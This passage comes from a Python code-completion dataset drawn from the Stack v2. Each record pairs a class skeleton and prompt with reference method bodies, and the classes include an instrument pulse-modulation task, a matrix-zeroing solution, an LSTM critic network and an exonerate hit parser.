<|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000058", "length_bytes": 7840, "license_type": "permissive", "methods": [{"docstring": "Validate the value of the switch.", "name": "check", "signature": "def check(self, *args, **kwargs)"}, {"docstring": "Default interface behavior.", "name": "i_perform", "signature": "def i_perform(self, switch=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007372", "prompt": "Implement the Python class `SetPulseModulationTask` described below.\n\nClass description:\nSwitch on/off the pulse modulation of the source.\n\nMethod signatures and docstrings:\n- def check(self, *args, **kwargs): Validate the value of the switch.\n- def i_perform(self, switch=None): Default interface behavior.", "prompted_full_text": "Implement the Python class `SetPulseModulationTask` described below.\n\nClass description:\nSwitch on/off the pulse modulation of the source.\n\nMethod signatures and docstrings:\n- def check(self, *args, **kwargs): Validate the value of the switch.\n- def i_perform(self, switch=None): Default interface behavior.\n\n<|skeleton|>\nclass SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "revision_id": "b6f1f5b236c7a4e28d9a3bc8da9820c52d789309", "skeleton": "<|skeleton|>\nclass SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n", "source": "the_stack_v2_python_sparse", "source_path": "exopy_hqc_legacy/tasks/tasks/instr/rf_tasks.py", "source_repo": "Exopy/exopy_hqc_legacy", "split": "test", "star_events_count": 0} {"blob_id": "bf1d9d057c085ad6297f2f0e7aa68370c76ff682", "bodies": ["rows = set()\ncolumns = set()\nfor i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\nfor row in rows:\n matrix[row] = [0] * len(matrix[0])\nfor column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0", "height = len(matrix)\nif height == 0:\n return\nwidth = len(matrix[0])\nfor i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\nfor i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0"], "bodies_text": "<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000059", "length_bytes": 1570, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "name": "setZeroes", "signature": "def setZeroes(self, matrix)"}, {"docstring": ":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "name": "setZeroes_O1", "signature": "def setZeroes_O1(self, matrix)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def setZeroes(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n- def setZeroes_O1(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def setZeroes(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n- def setZeroes_O1(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n<|end_body_1|>\n", "revision_id": "16e8a7935811fa71ce71998da8549e29ba68f847", "skeleton": "<|skeleton|>\nclass Solution:\n\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode4/setZeroes.py", "source_repo": "lizyang95/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "c6ede396fad99534e4d0a7f6161c53c2b2640c5d", "bodies": ["super(Critic, self).__init__()\nself.state_dim = state_dim\nself.action_dim = action_dim\nself.hidden = 128\nself.usecuda = usecuda\nself.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\nself.fcs1 = nn.Linear(self.hidden, 1)\nself.fcs1.weight.data.uniform_(-EPS, EPS)\nself.fca1 = nn.Linear(self.action_dim, 1)\nself.fca1.weight.data.uniform_(-EPS, EPS)\nreturn", "h = torch.zeros(batch_size, self.hidden)\nc = torch.zeros(batch_size, self.hidden)\nif self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\nreturn (h, c)", "action = action.view(-1, 1)\nx = state.permute(0, 2, 1)\ns = self.zero_state(state.size(0))\nfor t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\nreturn self.fcs1(s[0]) + self.fca1(action)"], "bodies_text": "<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "class_docstring": "Critic network", "class_name": "Critic", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000060", "length_bytes": 3704, "license_type": "permissive", "methods": [{"docstring": "Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.", "name": "__init__", "signature": "def __init__(self, state_dim, action_dim, usecuda=False)"}, {"docstring": "Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.", "name": "zero_state", "signature": "def zero_state(self, batch_size)"}, {"docstring": "Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.", "name": "forward", "signature": "def forward(self, state, action)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005194", "prompt": "Implement the Python class `Critic` described below.\n\nClass description:\nCritic network\n\nMethod signatures and docstrings:\n- def __init__(self, state_dim, action_dim, usecuda=False): Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\n- def zero_state(self, batch_size): Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\n- def forward(self, state, action): Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.", "prompted_full_text": "Implement the Python class `Critic` described below.\n\nClass description:\nCritic network\n\nMethod signatures and docstrings:\n- def __init__(self, state_dim, action_dim, usecuda=False): Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\n- def zero_state(self, batch_size): Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\n- def forward(self, state, action): Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\n\n<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "revision_id": "a02bdb1754e9bae1c2448e4bccec795c739b3e6f", "skeleton": "<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n", "source": "the_stack_v2_python_sparse", "source_path": "notebook/njord-ddpg/model.py", "source_repo": "LUOFENGZHOU/njord", "split": "test", "star_events_count": 0} {"blob_id": "0f3e18a6db60a54ee705e25d88090299b13cadc2", "bodies": ["tok = line.strip().split()\nassert len(tok) == 10\nassert tok[0] == 'sugar:'\nself.uid = uid\nself.qid = tok[1]\nself.qstart = int(tok[2])\nself.qend = int(tok[3])\nself.qstrand = tok[4]\nself.sid = tok[5]\nself.sstart = int(tok[6])\nself.send = int(tok[7])\nself.sstrand = tok[8]\nself.score = int(tok[9])\nself.lines = []", "tok = line.strip().split('\\t')[:8]\nif tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\nelif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\nelif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)"], "bodies_text": "<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "exoneratehit", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000061", "length_bytes": 11936, "license_type": "no_license", "methods": [{"docstring": "parse SUGAR hit from a line", "name": "__init__", "signature": "def __init__(self, line, uid)"}, {"docstring": "append a gff line to the result", "name": "append", "signature": "def append(self, line, uid)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002053", "prompt": "Implement the Python class `exoneratehit` described below.\n\nClass description:\nImplement the exoneratehit class.\n\nMethod signatures and docstrings:\n- def __init__(self, line, uid): parse SUGAR hit from a line\n- def append(self, line, uid): append a gff line to the result", "prompted_full_text": "Implement the Python class `exoneratehit` described below.\n\nClass description:\nImplement the exoneratehit class.\n\nMethod signatures and docstrings:\n- def __init__(self, line, uid): parse SUGAR hit from a line\n- def append(self, line, uid): append a gff line to the result\n\n<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "revision_id": "e006354ce41e6db029fb8cda02efaae60afc5327", "skeleton": "<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class exoneratehit:\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n", "source": "the_stack_v2_python_sparse", "source_path": "seq.py", "source_repo": "robertvi/rjvbio", "split": "test", "star_events_count": 0} {"blob_id": "1b359b11eba1efb9e4f787f074d9e7165a756920", "bodies": ["self.matrix = matrix\nrow = len(matrix)\nif row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix", "if not self.matrix:\n return 0\nif row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\nif row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\nif col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\nreturn 